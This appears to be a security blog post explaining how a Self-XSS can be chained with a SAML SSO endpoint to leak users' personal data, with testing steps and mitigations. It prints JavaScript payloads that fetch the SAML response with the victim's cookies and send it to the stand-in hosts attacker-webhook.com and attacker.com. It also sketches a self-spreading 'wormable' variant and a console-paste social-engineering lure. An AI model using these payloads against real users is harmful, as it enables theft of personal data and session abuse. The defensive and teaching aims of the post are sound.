The Insidious SAML Swap: How a Simple Self-XSS Unlocks a Treasure Trove of PII

Listen to this Post

Featured Image

Introduction:

A sophisticated attack chain demonstrates how a seemingly low-risk Self-XSS vulnerability can be weaponized into a critical PII leak by exploiting the intricacies of Single Sign-On (SSO) and the Same-Origin Policy. This technique, leveraging the SAML protocol within a same-origin context, bypasses traditional security boundaries, allowing an attacker to hijack a user’s authenticated session and exfiltrate sensitive personal information directly from the identity provider.

Learning Objectives:

  • Understand the attack chain from Self-XSS to full PII compromise via SAML assertion manipulation.
  • Learn how to identify and test for same-origin method vulnerabilities in SAML SSO implementations.
  • Implement mitigation strategies to prevent PII leakage through identity provider endpoints.

You Should Know:

  1. The Deceptive Nature of Self-XSS and SAML SSO Fundamentals

Self-XSS is often dismissed as a low-priority finding because it requires user interaction to execute malicious JavaScript in their own browser. However, when combined with a misconfigured SAML-based SSO system, its impact is dramatically amplified. Security Assertion Markup Language (SAML) is an XML-based standard for exchanging authentication and authorization data between an identity provider (IdP) and a service provider (SP). The core of the attack lies in the `/samlp` endpoint, which is used by the IdP to send the SAML response back to the SP after a user authenticates.

A typical SAML response looks like this:

<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" ...>
<saml2:Issuer>https://idp.example.com</saml2:Issuer>
<saml2p:Status>
<saml2p:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</saml2p:Status>
<saml2:Assertion ...>
<saml2:Subject>
<saml2:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml2:NameID>
...
</saml2:Subject>
<saml2:AttributeStatement>
<saml2:Attribute Name="firstName" ...>
<saml2:AttributeValue>John</saml2:AttributeValue>
</saml2:Attribute>
<saml2:Attribute Name="lastName" ...>
<saml2:AttributeValue>Doe</saml2:AttributeValue>
</saml2:Attribute>
<!-- PII Attributes like SSN, role, etc. -->
</saml2:AttributeStatement>
</saml2:Assertion>
</saml2p:Response>

This endpoint, if accessible via a `GET` request and lacking proper authorization checks, can become the conduit for PII leakage.

  1. Step-by-Step Attack Chain: From Lure to Data Exfiltration

The attack unfolds in several stages, turning a low-privilege flaw into a high-severity incident.

Step 1: The Lure. The attacker crafts a convincing social engineering message, tricking a victim into copying and pasting a malicious JavaScript payload into their browser’s developer console while logged into the target application. The payload is often obfuscated to avoid immediate suspicion.

// Example Deobfuscated Payload
fetch('/samlp?client-request-id=123', {
credentials: 'include' // Crucial: sends the user's session cookies
})
.then(response => response.text())
.then(samlData => {
// Send the SAML response containing PII to an attacker-controlled server
fetch('https://attacker-webhook.com/steal', {
method: 'POST',
body: btoa(samlData) // Base64 encode the data
});
})
.catch(err => console.error(err));

Step 2: Exploiting Same-Origin Method. The key to this attack is that the malicious script runs in the same origin (e.g., https://app.vulnerable.com`) as the SAML endpoint (https://app.vulnerable.com/samlp`). The browser’s Same-Origin Policy (SOP), which restricts how documents or scripts from one origin can interact with resources from another origin, does not block this request. Since the request is made with credentials: 'include', it carries the user’s active session cookies, authenticating them to the IdP.
Step 3: PII Extraction and Exfiltration. The script successfully retrieves the SAML response from the IdP. This XML document is a goldmine of PII, containing not just the user’s email, but often their full name, unique user ID, department, and other sensitive attributes defined in the attribute statement. The script then exfiltrates this data to a server controlled by the attacker.

  1. Identifying the Vulnerability: Testing Your Own SAML Endpoints

To assess your own applications for this vulnerability, you can use browser developer tools or command-line utilities like curl.

Manual Browser Testing:

1. Log into the application.

  1. Open Developer Tools (F12) and go to the Network tab.
  2. Navigate to or trigger a request to the SAML endpoint (e.g., `https://your-idp.com/samlp?…`).

4. Right-click the request and “Copy as cURL”.

  1. Execute the copied cURL command in a terminal. If it returns a valid SAML response without requiring fresh authentication, the endpoint is likely vulnerable.

cURL Command Example:

curl 'https://your-idp.com/samlp?client-request-id=test123' \
-H 'Cookie: session_cookie=YOUR_SESSION_COOKIE_VALUE' \
--compressed

A successful, non-redirected response containing your PII in plain XML confirms the issue.

4. Advanced Exploitation: Silent Attacks and Wormable Capabilities

The basic exfiltration script can be refined for stealth and persistence. An attacker could create a wormable payload that, upon execution by one user, silently scrapes their PII and then uses the compromised session to propagate the malicious script to other users within the same application (e.g., via chat messages or comment fields), creating a self-replicating data breach.

// A more advanced, "wormable" version (conceptual)
(async function() {
// Steal the SAML data
const samlResponse = await fetch('/samlp?client-request-id=' + Math.random(), {credentials: 'include'}).then(r => r.text());
// Exfiltrate to attacker server
await fetch('https://attacker.com/log', {method: 'POST', body: encodeURIComponent(samlResponse)});

// Worm propagation: Post the payload to an internal messaging system
const maliciousPayload = "javascript:" + encodeURIComponent(<code>(${arguments.callee})()</code>);
// Example: Automatically create a post with the payload (highly context-dependent)
// fetch('/api/chat/send', {method: 'POST', body: JSON.stringify({message: "Check this out: " + maliciousPayload}), credentials: 'include'});
})();

5. Mitigation Strategies: Hardening Your SAML Implementation

Preventing this attack requires a multi-layered defense-in-depth approach focusing on the IdP and application logic.

Enforce POST Bindings for SAML Responses: The SAML standard supports `GET` and `POST` bindings. For any endpoint that returns sensitive assertions, strictly use the `POST` binding, which is not trivially fetchable by a simple `GET` request from client-side JavaScript.
Implement Strict Authorization Checks: The `/samlp` endpoint must verify that the incoming request is not only authenticated but is also a valid, intended consequence of the SSO login flow. It should reject any direct browser navigation or AJAX call that lacks a valid, recent SAML request ID or other contextual token.
Apply Content Security Policy (CSP): A robust CSP can significantly hinder the attacker’s ability to exfiltrate data.

Content-Security-Policy: default-src 'self'; connect-src 'self'; script-src 'self'

This policy would block the request to attacker-webhook.com. While Self-XSS can sometimes bypass CSP, it raises the barrier considerably.
Sanitize SAML Responses: The IdP should practice the principle of least privilege, only including user attributes in the SAML response that are absolutely necessary for the SP to function. Avoid returning excessive PII.

What Undercode Say:

  • The Human Firewall is the Weakest Link, but the Architectural Firewall Should Be the Last. Never underestimate a vulnerability that requires user interaction. While training is important, the primary failure is an architectural one that allows a low-impact issue to escalate into a massive data breach.
  • Identity Providers are the New Crown Jewels. This exploit underscores that the IdP, which holds the master dataset of user identities and attributes, is a prime target. Its endpoints must be fortified with the same rigor as the most critical application databases.

This attack chain is a stark reminder that modern web application security cannot be assessed in isolation. The complex interactions between SPs and IdPs create new attack surfaces that are often overlooked during penetration tests and code reviews. The convergence of a social engineering weakness and a technical misconfiguration in a core authentication protocol creates a perfect storm, rendering sophisticated security controls like the Same-Origin Policy ineffective. Organizations must extend their security testing to cover these trust boundaries and data flows between integrated systems.

Prediction:

The technique of exploiting same-origin endpoints for PII leakage will rapidly evolve beyond SAML. We predict a rise in similar attacks targeting OAuth 2.0 and OpenID Connect (OIDC) endpoints, such as the `/userinfo` endpoint, which also returns JSON objects containing user attributes. As more enterprises consolidate identity management, these identity and access management (IAM) systems will become the central focus for advanced persistent threats (APTs) and data-harvesting campaigns. Furthermore, the automation of this exploit will lead to its integration into widespread phishing kits, commoditizing a capability that was once the domain of advanced attackers.

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Mohamedwagdy72 Self – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky